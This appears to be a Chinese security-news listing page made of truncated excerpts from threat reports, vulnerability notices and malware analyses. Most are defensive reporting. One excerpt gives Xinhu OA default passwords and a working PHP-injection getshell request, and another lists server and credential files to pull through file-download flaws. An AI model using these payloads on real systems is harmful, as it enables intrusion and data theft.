蓝队取证审计网络安全

1.概述 2024年2月12日，美国网络安全公司SentinelOne在其官网上发布题为“China’s Cyber Revenge/Why the PRC Fails to Back Its Claims of Western Espionage”的报告[1]，（以下简称“SentinelOne报告”），对“中国三家知名网络安全企业360、奇安信、安天及中国网络安全产业联盟（CCIA）”等机构揭露美方情报机构网络攻击的相关报告进行解读。我们先直接概括其报告中的观点和关键逻辑。 SentinelOne报告对我们公开的分析报告基于时间线进行了梳理，并引述一些美方人士观点，设定了如下观点： 1、中方报告是对国际其他机构对美方分析的跟进，存在长期滞后； 2、中方分析工作严重依赖美方自身的信息泄露； 3、中方报告没有“PCAP包”级别的技术实证。 SentinelOne报告的逻辑并不是应答全球网络安全业界和研究者过去二十年来对美方情报机构攻击活动和能力的持续分析曝光，包括在美方多次信息泄露中所暴露出来的触目惊心的真相，而是试图把国际关注度转移到中国网络安全工作者的技术能力和水平是否能够支撑其持续独立发现、分析、研究、溯源美方的攻击上，并将实证的概念窄化为一种具体的技术格式。美西方此前长时间习惯性地从宏观层面夸大中国网络安全能力，以便为其情报机构和军工复合体争取巨额的网络安全预算，而此时，突然又在微观层面开启一波认为中国分析溯源能力很差的“嘲讽”流，并宣判：作为被霸凌者，你们反抗无效！ 对SentinelOne报告所提及的中国安全企业的分析报告，有…

TDDP 服务程序在 UDP 端口 1040 上监听时，处理数据时未能正确检查长度，这导致了内存溢出，破坏了内存结构，最终引发了服务中断。 本文深入分析了一个在 2020 年向 TP-Link 报告的安全漏洞。遗憾的是，至今没有 CVE 编号分配给这个漏洞，因此相关的详细信息并未公之于众。通常，阅读技术分析报告能够带来丰富的见解和学习机会。我坚信，公开分享研究方法和成果对整个行业以及广大的学习者、学生和专业人士都有着积极的意义。 在本文中，我将使用 Shambles 这个工具来识别、逆向分析、模拟并验证这个导致服务中断的缓冲区溢出问题。如果您对 Shambles 感兴趣，可以通过加入 Discord 服务器并查阅 FAQ 频道来了解更多信息。 首先，我们来介绍一下 TDDP 协议，这是一种在专利 CN102096654A 中详细描述的二进制协议。您需要了解的所有协议细节都在专利描述中。不过，我会在这里为您做一个简要的总结。 TDDP 是 TP-LINK 设备调试协议的缩写，它主要用于通过单个 UDP 数据包进行设备调试。这种协议对于逆向分析来说非常有趣，因为它是一个需要解析的二进制协议。TDDP 数据包的作用是传输包含特定消息类型的请求或命令。下图展示了一个 TDDP 数据包的结构。 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +…

1 概览 近期，安天CERT监测到通过GitHub传播窃密木马的攻击活动。攻击者在其发布项目的环境依赖文件requirements.txt中添加恶意URL，以获取其恶意篡改的流行开源模块，从而在受害者电脑中植入窃密木马。 攻击者使用空格将恶意代码掩藏在该行代码的末尾，以避免被用户察觉；并使用多种手段对恶意代码进行混淆处理，以规避安全产品检测、阻碍安全人员分析。经过多层脚本载荷的传递后，将执行一种由Python编写的窃密木马。该窃密木马会在受害主机中窃取浏览器、社交平台、加密货币钱包、游戏客户端中的敏感信息，并针对目标路径中匹配关键词的文件夹及文件进行窃取，最终将窃密数据回传至C2服务器或上传至文件共享平台Gofile中。 在此次攻击活动中，攻击者在自己发布的项目中引入经过恶意篡改的流行开源模块，从而传播窃密木马。对流行的开源项目进行篡改，在其中添加恶意代码后重新打包并在发布的项目中进行恶意引用，已经成为一种攻击方式，用户很难察觉环境依赖文件中是否存在异常。用户在使用网络中非流行、未证实安全性的开源项目时也需保持警惕，以避免执行掩藏在其中的恶意代码。 经验证，安天智甲终端防御系统（简称IEP）可实现对该窃密木马的有效查杀。 2 技术梳理 攻击者在GitHub中上传项目，并在环境依赖文件requirements.txt中添加恶意URL。当用户使用该项目时，需要根据该文件中的内容进行配置，从而下载执行经过攻击者恶意篡改的colorama模块。 攻击者添加的恶意代码用于从其服务器中获取“version”文件，该文件使用Fernet算法进行加解密…

概述 上周（2024年3月6号），悬镜供应链安全情报中心在Pypi官方仓库（https://pypi.org/）中捕获1起新的Py包投毒事件，Python组件tohoku-tus-iot-automation 从3月6号开始连续发布6个不同版本恶意包，其中多个版本恶意代码使用PyArmor进行加密混淆保护，这些恶意包主要针对Windows平台的Python开发者，除了会窃取系统基础信息和主流浏览器(Edge、Chrome)用户密码数据，还会远程下载木马程序植入到开发者系统中盗取系统密码。 python恶意组件 截至目前，恶意组件tohoku-tus-iot-automation在Pypi官方仓库上已被下载461次。 tohoku-tus-iot-automation恶意组件下载量 该恶意组件包在国内主流Pypi镜像源(清华大学、腾讯云等)仍可正常下载、安装该恶意包，因此潜在的受害者数量将会更多。 以国内清华大学镜像源为例，可通过以下命令测试安装该恶意组件包。 pip3 Install tohoku-tus-iot-automation -i https://pypi.tuna.tsinghua.edu.cn/simple 投毒分析 当Python开发者使用pip install从Pypi官方仓库或下游镜像源直接安装或者依赖引用恶意组件包时，将自动触发执行组件包setup.py中的恶意攻击代码。setup.py被PyArmor加密混淆保护。 原始的恶意代码如下所示： 恶意代码主要包括4大攻击步骤： 收集系统信息 收集浏览器…

概述 悬镜供应链安全情报中心通过持续监测全网主流开源软件仓库，结合程序动静态分析方式对潜在风险的开源组件包进行动态跟踪和捕获，发现大量的开源组件恶意包投毒攻击事件。在2024年2月份，悬镜供应链安全情报中心在NPM官方仓库（https://www.npmjs.com）和Pypi官方仓库（https://pypi.org）共捕获503个不同版本的恶意组件包，其中NPM仓库投毒占比89.46%， Pypi仓库投毒占比10.54%，NPM仓库依旧是开源组件包投毒的重灾区。 2024年2月份投毒包总量 2024年2月份投毒包每日统计 结合源代码分析、动态行为监控等方式，我们对2月份捕获的开源组件投毒包进行多维度分析，总结统计出主流的攻击方式和恶意行为标签。 投毒攻击方式主要包括： ·恶意文件执行 ·代码混淆执行 ·恶意文件下载 ·shell命令执行 ·恶意文件释放 其中，恶意文件执行是最常用的攻击方式（占比78.13%），其主要攻击流程是利用开源组件包管理器在安装组件包过程中利用自定义的恶意指令来加载并执行内置在组件包中的恶意文件(py、pyc、js、shell、pe、dll、elf、so等)。此外，在组件安装包中直接嵌入恶意shell命令（占比8.87%）、恶意文件下载（占比4.28%）及恶意文件释放后执行也是投毒者惯用的攻击手法。为了逃避安全检测，部分恶意包使用了代码编码、加密及混淆（占比7.61%）等方式进行恶意代码隐藏。 攻击方式统计 在所有投毒包的恶意行为中，窃取系统信息占比超过85%，信息窃取的主要目标是开发者系统的密码文…

安全研究人员最新发现一起针对 Linux 主机上的 Redis 服务器的安全活动——威胁组织正使用名为“Migo”的恶意软件来挖掘加密货币。 Redis（远程字典服务器）是一种内存数据结构存储，用作数据库、缓存和消息代理，以其高性能而闻名，每秒为游戏、技术、金融服务等行业的实时应用程序提供数千个请求。 威胁组织通常利用暴露的和可能易受攻击的 Redis 服务器来劫持资源、窃取数据和实施其他恶意目的。 新的恶意软件的不同之处在于使用系统削弱命令来关闭 Redis 安全功能，从而允许加密劫持活动较长时间持续。 Migo 活动由云取证提供商 Cado Security的分析师所发现，他们在蜜罐中观察到攻击者使用 CLI 命令关闭保护配置并利用服务器。 关闭 Redis 防护罩 在暴露的 Redis 服务器受到攻击后，攻击者会禁用关键的安全功能，以允许接收后续命令并使副本可写。 Cado 表示，他们注意到攻击者通过 Redis CLI 禁用了以下配置选项： ·set protected-mode：禁用此选项将允许外部访问 Redis 服务器，从而使攻击者更容易远程执行恶意命令。 ·replica-read-only：关闭此功能使攻击者能够直接写入副本并在分布式 Redis 设置中传播恶意负载或数据修改。 ·aof-rewrite-incremental-fsync：禁用它可能会导致在仅追加文件 (AOF) 重写期间产生更重的 IO 负载，来帮助攻击者不被检测到。 ·rdb-save-incremental-fsync：关闭它可能会导致 RDB 快…

漏洞概述 漏洞类型 越界写入/远程命令执行 漏洞等级 高危 漏洞编号 CVE-2024-21762 漏洞评分 9.3 利用复杂度 低 影响版本 FortiOS & FortiProxy 利用方式 远程 POC/EXP 已公开 Fortinet FortiOS是美国飞塔（Fortinet）公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。在SSL VPN组件中存在越界写入漏洞，可能导致未经身份验证的远程威胁者通过特制HTTP请求执行任意命令或代码。 具体影响版本： FortiOS 7.4.0 - 7.4.2，7.2.0 - 7.2.6，7.0.0 - 7.0.13，6.4.0 - 6.4.14，6.2.0 - 6.2.15，6.0.0 - 6.0.17FortiProxy 7.4.0 - 7.4.2，7.2.0 - 7.2.8，7.0.0 - 7.0.14，2.0.0 - 2.0.13，1.2-1.0漏洞复现 daydaypoc漏洞平台于2024年3月12日已收录该漏洞。 以下链接可查看详情： https://www.ddpoc.com/DVB-2024-6401.html 解决方案 官方已修复该漏洞，受影响用户可升级到以下安全版本： FortiOS 7.4版升级至>=7.4.3 FortiOS 7.2版本升级至>=7.2.7 FortiOS 7.0版本升级至>= 7.0.14 FortiOS…

0x01 前言 信呼OA是一款开源的OA系统，面向社会免费提供学习研究使用，采用PHP语言编写，搭建简单方便，在中小企业中具有较大的客户使用量。从公开的资产治理平台中匹配到目前互联中有超过1W+的客户使用案例。 信呼OA目前最新的版本是V2.6.2，发布时间是2023-12-22。作者整体上保持了较高的系统更频率，对历史爆出的安全问题也及时进行修复。目前网上能找到的信呼OA getshell的办法大多数是老版本或者是需要admin权限的，没有针对新版本进行getshell的思路。 0x02 步骤 本地搭建当前最新版的信呼OA系统V2.6.2，如下图所示。 使用普通OA用户登陆，信呼OA安装之后默认存在账号diaochan/xiaoqiao/daqiao/rock/zhangfei/zhaozl等用户，密码都是123456。这里使用普通用户xiaoqiao登陆，然后构造下面的请求。 http://xinhu.test.com:8890/index.php?d=main&m=flow&a=copymode&ajaxbool=true POST:id=1&name=a{};phpinfo ();class a 生成的文件访问如下（以下两种方式均可）： http://xinhu.test.com:8890/webmain/flow/input/mode_a%7B%7D%3Bphpinfo%20%28%29%3Bclass%20aAction.php http://xin…

安全研究人员查看 Parrot 流量引导系统 (TDS) 使用的 10,000 多个脚本后，发现逐渐优化的演变过程使恶意代码对安全机制更加隐蔽。 Parrot TDS 于 2022 年 4 月被网络安全公司发现，自 2019 年以来一直活跃。主要针对易受攻击的 WordPress 和 Joomla 网站，使用 JavaScript 代码将用户重定向到恶意位置。 研究人员分析，Parrot 已经感染了至少 16,500 个网站，是一次大规模的恶意操作。 Parrot 背后的运营商将流量出售给威胁组织，威胁组织将其用于访问受感染网站的用户，以进行分析并将相关目标重定向到恶意目的地，例如网络钓鱼页面或传播恶意软件的位置。 不断演变的恶意软件 Palo Alto Networks 的 Unit 42 团队最近发布的一份报告显示，Parrot TDS 仍然非常活跃，并且 JavaScript 注入更难以检测和删除。 Unit 42 分析了 2019 年 8 月至 2023 年 10 月期间收集的 10,000 个 Parrot 登陆脚本。研究人员发现了四个不同的版本，显示了混淆技术使用的进展。 Parrot 的登陆脚本有助于用户分析，并强制受害者的浏览器从攻击者的服务器获取有效负载脚本，从而执行重定向。 Parrot 攻击链 据研究人员称，Parrot TDS 活动中使用的脚本是通过代码中的特定关键字来识别的，包括“ ndsj ”、“ ndsw ”和“ ndsx ”。 Unit 42 注意到，所检查样本中大多数感染已转移到最新版本的…

近日人脸识别防护问题已成焦点，嘉峪关网警、大连市银行协会发布信息，称市民A先生与不法分子视频通话期间手机被犯罪分子控制，未接收到验证码，通话后手机收到消息提示，银行定期存款已被销户，银行人脸识别系统未发挥效果，资金已被转出。经侦查后发现，犯罪分子事先获取了A先生的身份证影像信息，并通过技术手段合成了短视频，使用该视频成功应对了银行大额资金转账时的人脸识别验证。 目前人脸识别防护技术存在明确的安全隐患，人脸信息发生泄露的风险主要存在于收集、存储、使用、加工、传输，其中使用、加工、传输需要金融机构等厂商提高重视度，收集、存储环境也需消费者提高警惕心。消费者不应随意同陌生人的视频聊天、下载来源不明的App、随意参与App内的录制视频/声音活动，北京互联网法院综合审判三庭副庭长曾表示“一些营销短视频、音频的商家经常在未经当事人许可和同意的情况下进行换脸、换声操作，以此获利”，降低人脸信息的收集、存储环节的安全隐患。消费者应保护好银行卡号、密码、身份证等个人信息；人脸、指纹等个人生物信息，发现可疑行为及时报警。 个人生物信息一旦泄露便后患无穷，尤其是人脸信息，上述案例中的收集人脸信息、通过技术手段攻击人脸识别防护系统，攻破后进行盗取转移资金等违法行为的犯罪链已较为成熟。通过AI技术攻击人脸识别防护系统的手段可分为深度伪造攻击与对抗样本攻击。深度伪造攻击是将一个人的面部表情移植到另一个人照片的面部，从而让被移植人照片活化起来；对抗样本攻击是在人脸照片上添加难以察觉的微小扰动使人脸识别系统误判。本次案例中，不法分子极可能是利用视频通话采集受害者人脸信息…

众多开发者认为SO文件相对而言更加安全，并将许多核心算法、加密解密方法、协议等放在SO文件中。但是，黑客可以通过反编译SO库文件，窃取开发者花费大量人力物力财力的研发成果，进行创意窃取或二次打包，使得开发者和用户利益受损。 作为知名移动信息安全综合服务提供商，爱加密在SO加固方面拥有3大技术优势。 一、爱加密so VMP技术，对so文件的源码进行虚拟化保护，实现数据隐藏、防篡改、防Dump，增加逆向分析的难度。 二、爱加密so Linker技术，对so文件代码段、导出表和字符串等进行加密压缩，在函数运行时动态解密，防止so文件被静态分析，通过内存DUMP源码。 三、多重保护：多种so加固技术可以联合使用，增大了代码反汇编调试破解难度，提高so文件的安全性。爱加密可对Android及Linux 进行so加固，本次仅讲述Android SO加固方面的6大核心技术，即so加壳、so源码混淆、so源码虚拟化保护、so防调用、so Linker、so融合。 so加壳 利用自定义加密算法对C/C++源码编译出来的so文件进行加壳，将so文件的编码进行改变，使加壳后的so文件无法通过ida反编译工具查看导出符号，使so文件无法正确反编译和反汇编。加固后效果如图： so 源码混淆 爱加密通过对so文件的源码进行混淆，降低黑客反编译的可读性，增加反编译难度。可多种混淆方式联用，可根据自己的实际需求选择混淆强度，包含字符串加密、等效指令替换、基本块调度、基本块分裂、虚假控制流、控制流扁平化、控制流间接化，本次篇幅有限仅介绍前四种技术手段。 字符串加密：…

背景 虽然整体上大家做分类分级的背景以及目标基本一致：满足监管要求；为数据合规和安全体系建设打好基础。但是实施落地的过程不尽相同，每个客户所处的行业不同，所要遵循的分类分级标准不同，同时每个客户的数据也是截然不同，定制化需求是普遍存在。 当前一些业务模式相对简单的公司，使用excel的方式人工进行数据分类分级；规模更大业务更复杂的公司自研或采购第三方数据分类分级产品或服务。市场上大部分供应商采取产品+服务的方式服务客户，其中产品敏感识别能力较弱更多以运营功能为主，敏感数据识别更多的以人力服务的方式帮助客户进行梳理，虽然能满足监管要求，但是存在以下公认的问题： · 无法做到持续运营，交付的产物是基于当时的数据情况，后续新增数据要么需要人介入重新进行梳理，要么无法保证能够持续准确识别 · 准确率低或不稳定，特别是在数据元信息质量较低的情况 · 人力投入成本高 仅满足监管要求不是我们的终极目标，我们希望用九智汇分类分级产品在满足监管的前提下，为数据合规和数据安全打下坚实的基础，所以我们： · 采集样本数据，走样本数据为主、元数据为辅的技术路线，一方面可以保证已建设的识别能力可持续识别，另一方面准确率稳定性不受元数据质量影响 ·提供智能化、 无侵人、开箱即用的同时，打造易用、灵活、强大的自定义功能，满足客户的定制化需求，一方面降低交付成本，另一方面降低门槛让客户可以自助使用产品进行敏感数据识别。 实践方案 如果没有系统或产品，纯人工来做数据分类分级，基本上大家完成这件事情的步骤都是：找数据在哪里->梳理数据有哪些->找敏感数据-&gt…

1 前言 2016年前后，勒索攻击的主流威胁形态已经从勒索团伙传播扩散或广泛投放勒索软件收取赎金，逐渐转化为RaaS+定向攻击收取高额赎金的运行模式。RaaS为Ransomware as a Service（勒索即服务）的缩写，是勒索团伙研发运营的勒索攻击基础设施，包括可定制的破坏性勒索软件、窃密组件、勒索话术和收费通道等。各种攻击团伙和个人租用RaaS攻击基础设施，在获得赎金后，与RaaS攻击组织分账结算。在众多勒索攻击组织中，LockBit组织最为活跃，从其公布的数据显示，LockBit的RaaS支撑了上千起的攻击活动，并因一例涉及中资企业海外机构案例被国内外广泛关注。 为有效应对RaaS+定向勒索风险，防御者需要更深入地了解定向勒索攻击的运行机理，才能构建有效的敌情想定，针对性的改善防御和响应能力。因此，择取典型案例，对此类攻击进行深度复盘极为重要。但由于相关涉我案例的分析支撑要素并不成熟，安天CERT在其他近期重大攻击案例中进行了筛选，选择了同样与LockBit组织相关，且可参考信息相对丰富的波音公司遭遇定向勒索攻击事件（以下简称本事件）展开了完整复盘分析。安天CERT长期关注和分析勒索攻击，对LockBit等攻击组织的持续关注，形成了较为系统的分析积累，依托安天赛博超脑平台的情报数据，CISA等机构对本事件公布的相关公开信息展开工作。从攻击过程还原、攻击工具清单梳理、勒索样本机理、攻击致效后的多方反应、损失评估、过程可视化复盘等方面开展了分析工作，并针对事件中暴露的防御侧问题、RaaS+定向勒索的模式进行了解析，并提出了防御和…

重发按语：2023年6月1日，卡巴斯基发布报告《三角行动：iOS设备被以前未知的恶意软件攻击》，当时报告中仅进行了事件披露，没有发布样本分析。为让全球用户更深入了解A2PT攻击组织的攻击能力，安天CERT在6月9日披露了一份历史积累分析成果，曝光了同一威胁来源方向的历史样本分析。与卡巴曝光的攻击来自于针对手机iMessage服务投放不同，安天曝光的样本来自于“量子”系统的投放，报告也因此命名为《“量子”系统击穿苹果手机》。历经数月的艰苦分析，卡巴于今日发布了新分析成果报告《三角行动：最后一个谜团》。安天勘误重发6月的报告，也提醒用户应广泛关注来自量子系统的空中投放。 // 该报告首次发布时《图 5‑3 量子系统可攻击场景图谱化分析》有误，已经勘正，特此致歉。 1 概述：覆盖智能终端的A2PT样本拼图 在过去二十多年的时间里，全球关键信息基础设施运营者、安全厂商、研究者所面临的重大考验是，如何应对以NSA等情报机构所发动的网络攻击活动，基于这种攻击活动应用了难以想象的技术与资源，安天CERT将这种攻击活动称之为A2PT（高级的高级持续性威胁）攻击，并发现其中多起攻击都来自于NSA下属的方程式组织。如何把A2PT攻击活动中的攻击样本与过程揭示出来，成为了一场比马拉松更艰苦的分析接力赛，这场接力至少已经完成了三次交接棒，第一阶段从2010年的“震网”事件触发，围绕“震网”—“火焰”—“毒曲”—“高斯”系列样本的攻击活动、样本同源性与关联展开，直到2013年的斯诺登事件出现，才发现这些只是冰山一角；第二阶段是从方程式组织（隶属于NSA）被曝光开始…

最近，趋势科技管理的XDR (MxDR)团队处理了涉及AsyncRAT的各种样本，这是一种具有多种功能的远程访问工具(RAT)，例如键盘记录和远程桌面控制，这种工具可以使其对受害者构成重大攻击。例如，攻击者会冒充当地银行和执法机构，将AsyncRAT传播给他们的目标。 2021年，AsyncRAT参与了名为“Spalax行动”的网络钓鱼活动，这些网络钓鱼活动一直持续到2021年底和2022年初。他们使用HTML附件进行AsyncRAT传播，同时还集成了反射加载技术。 t0：用户下载带密码保护的ZIP文件downloadedFile_SSAfnmeddOFzc.zip； 1分20秒：用户解压缩包含.wsf脚本的ZIP文件 1分26秒：下载并执行第一个有效负载，导致下载第二个有效负载； 1分35秒：自动启动； 1分59秒：下载并执行第二个有效负载； 5分48秒：进程注入到aspnet_compiler.exe和通过动态DNS的命令与控制(C&C)连接 下图描述了对涉及aspnet_compiler.exe的可疑活动的检测，该活动试图与外部IP地址45[.]141[.]215[.]40建立连接。同时，我们的分析揭示了有关PowerShell脚本和批处理文件的执行情况。我们能够使用这些数据作为支点，回溯并调查文件的入口点及其附加活动。 被触发的工作台警报 我们发现，攻击的触发因素是一个最初通过谷歌Chrome下载的名为downloadd_file_ssafnmeddofzc .zip的文件。 通过Chrome浏览器下载download…

每年都会有大量的公司发生重大数据泄露事件，例如2022年Medibank和Optus的数据泄露、Twitter的数据泄露、Uber和Rockstar的数据泄露以及2023年T-Mobile、MailChimp和OpenAI的数据泄露。在2022年，卡巴斯基实验室列出了全球700家来自不同行业的公司，然后在暗网上搜索，试图分析这些公司遭受攻击的可能性有多大？ 研究发现，暗网里的帖子都是关于出售受攻击帐户、内部数据库和文档，以及访问公司基础设施。虽然暗网确实促进了各种数据类型的销售，例如，银行卡信息、驾驶执照和身份证照片等，但本文重点还是放在了与企业特别相关的信息上。研究发现700家公司中有223家在暗网上被提及，泄露数据的主题也不同。 各行业分布 这意味着三分之一的公司在与销售数据或访问相关的暗网帖子中被引用，即使是网络安全成熟度高的公司也避免不了被黑客攻击。 本文提供了一个统计概述，包括所有暗网帖子，涉及2022年1月至2023年11月期间出售、购买或免费传播受攻击帐户的数据。 数据泄露 数据泄露会暴露机密、敏感信息，并可能导致重大问题。最常见的例子是数据库和内部文档，因为所有有一定规模的公司都使用机密数据，泄露会影响公司本身、员工和客户。 暗网上每月大约有1700个新的帖子出现，涉及销售、传播或购买泄露数据。 2022年1月至2023年11月与数据库出售/购买相关的消息数量 应该注意的是，并不是每条消息都代表一条最新出现的泄漏，其中有些是重复的广告相同泄漏。 一个组合报价的示例 另一种流行的泄露类型是收集公共数据的数据库，如姓名…

恶意软件分析涵盖一系列活动，其中包括仔细检查恶意软件的网络流量。要想有效地做好这项工作，关键在于要了解常见的威胁以及如何克服这些威胁。下面将介绍企业可能遇到的三个常见问题以及解决它们所需要的工具。 解密HTTPS流量 超文本安全传输协议（HTTPS）原本是一种确保安全在线通信的协议，如今却已经成为了恶意软件隐藏其恶意活动的一种工具。通过伪装受感染设备与指挥和控制（C&C）服务器之间的数据交换，恶意软件就可以在不被发觉的情况下运行，往外泄露敏感数据，安装额外的攻击载荷，并接收来自攻击者团伙的指令。 然而，如果有合适的工具，解密HTTPS流量就轻而易举。为此，我们可以使用中间人（MITM）代理，MITM代理充当了客户机与服务器之间的中介，可以拦截两者之间传输的信息。 MITM代理帮助分析人员实时监控恶意软件的网络流量，以便他们清楚地了解恶意活动。除此之外，分析人员还可以访问请求和响应数据包的内容、IP以及URL，以查看恶意软件通信的详细信息，并识别窃取的数据，这种工具对于提取恶意软件使用的SSL密钥特别有用。 图1. ANY.RUN沙箱提供的有关AxileStealer的信息 在这个例子中，初始文件（大小为237.06 KB）投放AxilStealer的可执行文件（大小为129.54 KB）。作为一种典型的信息窃取器，它获得了访问存储在网络浏览器中的密码的权限，开始通过Telegram消息传递连接将密码传输给攻击者。 规则“STEALER [ANY.RUN] Attempt to exfiltrate via Telegram”（…

FortiGuard实验室最近发现了一个电子邮件钓鱼活动，利用欺骗性的预订信息引诱受害者点击恶意PDF文件。PDF下载了一个用PowerGUI创建的 .NET可执行文件，然后运行PowerShell脚本来获取最终的恶意软件，称为MrAnon Stealer。 该恶意软件是一个基于Python的信息窃取程序，使用cx Freeze压缩以逃避检测。MrAnon Stealer窃取受害者的凭据、系统信息、浏览器会话和加密货币扩展，攻击流程如下所示。 攻击流 下载网址主要在德国被查询，这表明它是攻击的主要目标。这个URL的查询数量在2023年11月显著上升，该活动在该月异常活跃和激进。在本文中，我们将详细介绍该恶意软件在每个阶段的行为。 初始感染载体：Booking.pdf 攻击者伪装成一家希望预订酒店房间的公司，发送主题为“12月房间可用性查询”的网络钓鱼电子邮件。该网站包含假日期间虚假的酒店预订信息，附加的恶意PDF文件有一个下载链接隐藏在对象中。其解码后的数据如下： 网络钓鱼邮件 恶意PDF文件 .NET可执行文件：adobe.exe 通过“Loader”类中的字符串，可以发现恶意软件使用了PowerShell脚本编辑器，该编辑器将PowerShell脚本转换为微软可执行文件。 反编译的Exec()函数 在检查下图所示的.NET可执行文件后，我们发现它利用ScriptRunner.dll提取“Scripts.zip”以获得一个PowerShell脚本。解压后的文件存放在以下位置： “%USERPROFILE%\AppData\L…

探索Cobalt Strike shellcode是由编译后的可执行.exe文件加载情况，这将需要使用调试器(x64dbg)和静态分析(Ghidra)来执行完整的分析。 可执行文件是编译后的exe，包含隐藏和混淆的Shellcode，使用一个简单的异或例程和一个4字节的项对shellcode进行解码，然后将其写入一个用VirtualAlloc创建的简单缓冲区。 本文将探索使用调试器获得解码的shellcode的方法，然后寻找使用Ghidra手动定位shellcode和相关解密密钥的方法，还将研究在X64dbg和Ghidra之间切换的方法，以及使用ChatGPT识别和分析Ghidra输出的方法。 获取样本 点此下载样本(pw:infected)。 SHA256: 99986d438ec146bbb8b5faa63ce47264750a8fdf508a4d4250a8e1e3d58377fd 分析 我们可以先把文件保存到一台分析机上然后用感染的密码解压缩。从这里我们还可以创建一个文件名较短的副本。 由于该文件是已编译的可执行文件，我们可以尝试使用调试器对其进行分析。在本文中为x64dbg。 我们可以继续使用x64dbg打开文件，一直点击直到到达入口点。 现在，我们可以继续在API上创建一些断点，这些断点通常(但并不总是)在恶意软件解包时使用。 我们可以通过运行bp VirtualAlloc和bp VirtualProtect来创建2个断点。 创建断点后，我们可以继续并允许恶意软件继续(F9)。恶意软件将继续运行并触发VirtualAl…

MANTICORE的攻击范围正在逐步扩大（上） Web shell Manticore部署了多个Web shell，包括之前被间接归因于OilRig的Web shell，其中一些web shell因其混淆、命名约定和工件而更受关注。与Manticore在过去几年的攻击中使用的许多其他web Shell和基于.NET的工具相比，web Shell保留了类和方法模糊以及类似的字符串加密算法，该加密算法与一个字节异或，密钥从第一个字节或前2个字节派生。 其中一个shell是对开源XML/XSL转换web shell (XSL Exec shell)进行了严重混淆和略微修改的版本。这个web shell还包含两个混淆的函数，它们返回字符串“~/1.aspx”。这些函数从未被调用过，很可能是其他版本的残余，正如我们在Manticore之前使用的工具(如FOXSHELL)中观察到的那样： FOXSHELL web shell版本中未使用的字符串 攻击目标 根据对最新利用LIONTAIL的分析发现，受害者遍布中东地区。大多数受影响的实体属于政府、电信、军事和金融部门，以及IT服务提供商。 至少从2019年开始，Manticore就开始在中东地区活跃。它最初是基于开源的web部署代理，随着时间的推移演变成一个多样化和强大的工具集，既利用了自定义编写的组件，也利用了开源组件。 Manticore使用的多个恶意软件版本的代码和功能演变概述 基于Tunna的Web shell 最早的一个与攻击者活动相关的样本是基于Tunna的web shell, Tunn…

Check Point Research与Sygnia事件响应小组合作，追踪分析Manticore活动，这是一个主要针对中东政府和电信部门的攻击活动。据分析，Manticore与OilRig(又名APT34、EUROPIUM、Hazel Sandstorm)有关联。 在最新的攻击活动中，攻击者利用了LIONTAIL框架，这是一套复杂的自定义加载程序和内存驻留shellcode有效负载。Manticore使用HTTP.sys驱动程序的未记录功能从传入的HTTP流量中提取有效负载。观察到的LIONTAIL相关恶意软件的多种变体表明，Manticore为每台受攻击的服务器生成了一个自定义的植入程序，使恶意活动能够融入合法的网络流量中，并且无法从中识别。 尽管LIONTAIL框架本身看起来很独特，并且与任何已知的恶意软件家族没有明显的代码重叠，但这些攻击中使用的其他工具与之前报告的活动重叠。最值得注意的是，其中一些最终与OilRig有关联。 在这篇文章中，我们提供了最新工具的技术分析。 LIONTAIL框架 LIONTAIL是一个恶意软件框架，包括一组自定义shellcode加载器和内存驻留shellcode有效负载。它的一个组件是用c语言编写的LIONTAIL后门。它是一个轻量级但相当复杂的被动后门，安装在Windows服务器上，使攻击者能够通过HTTP请求远程执行命令。后门为其配置中提供的url列表设置侦听器，并执行攻击者向这些url发送请求的有效负载。 LIONTAIL后门组件是最新的Manticore攻击中使用的主要植入程序。利用来自面向…

0x01 前言 任意文件下载漏洞作为最常见的WEB漏洞之一，在平常的渗透测试中经常遇到，但是很多人却并没有深入去想该如何利用这种漏洞，导致忽略了一些细节的信息。 0x02 传统利用 1） 下载配置文件连数据库 通过任意文件下载漏洞下载网站配置文件，利用数据库配置信息远程连接数据库。 php：通过读取当前页面源码反向查找数据库配置文件 aspx: Web.config java:WEB-INF/web.xml、WEB-INF/classes/applicationContext.xml 、application.yml、application.properties、conf/tomcat-users.xml 其它配置： php.ini、my.ini、MetaBase.xml、access.log 2) 下载操作系统敏感文件 通过下载操作系统中的文件获取敏感信息，不同操作系统中的敏感文件包括 Windows： C:\Windows\win.ini C:\Windows\System32\drivers\etc\hosts C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.{%d}.gthr 其中%d替换为1-500的数字，文件中保存大量应用对应的临时文件路径，可以泄露敏感信息，有时有奇效 C:\Users\Administrator\AppData\Roaming\Microsoft\Window…

本文介绍了在Chrome、Edge和Safari中实现可靠的DNS重绑定的新技术，并讨论了绕过本地网络限制的技术。通过分析慢缓存的根本原因，提出了新的解决技术。本文研究了利用DNS重绑定在Chrome、Edge和Safari中实现瞬间DNS重绑定的攻击技术。 本文是关于DNS重新绑定系列文章中的第二篇。第一篇文章介绍了一个使用DNS重新绑定后攻击的案例。在这篇文章中，我介绍了在IPv6可用时在Chrome, Edge和Safari中实现可靠的，瞬间DNS重新绑定的新技术，以及一种绕过本地网络限制的技术，该技术适用于基于Chrome的浏览器的获取API。 浏览器中的DNS重绑定传统上被视为攻击者通过诱骗受害者加载恶意网站来访问内部网络服务的一种方式，但随着许多现代web应用程序现在在其部分功能上驱动无头浏览器，它已成为攻击web应用程序的有用工具。无头浏览器，即 Headless Browser，是一种没有界面的浏览器。它拥有完整的浏览器内核，包括 JavaScript 解析引擎、渲染引擎等。与普通浏览器最大的不同是，无头浏览器执行过程中看不到运行的界面，但是我们依然可以用 GUI 测试框架的截图功能截取它执行中的页面。在上一篇文章中，我介绍了一个使用可能是最简单的重新绑定方法的例子。在这种情况下，我有很长的时间让漏洞运行，但这在许多web应用程序中不太可能，需要更快的技术。 缓慢的缓存 简单的DNS重绑定技术依赖于对相同主机名的连续查找返回不同的DNS记录。对于这些攻击，所花费的最小时间是浏览器执行两次连续DNS查找之间的时间。这有时可以…

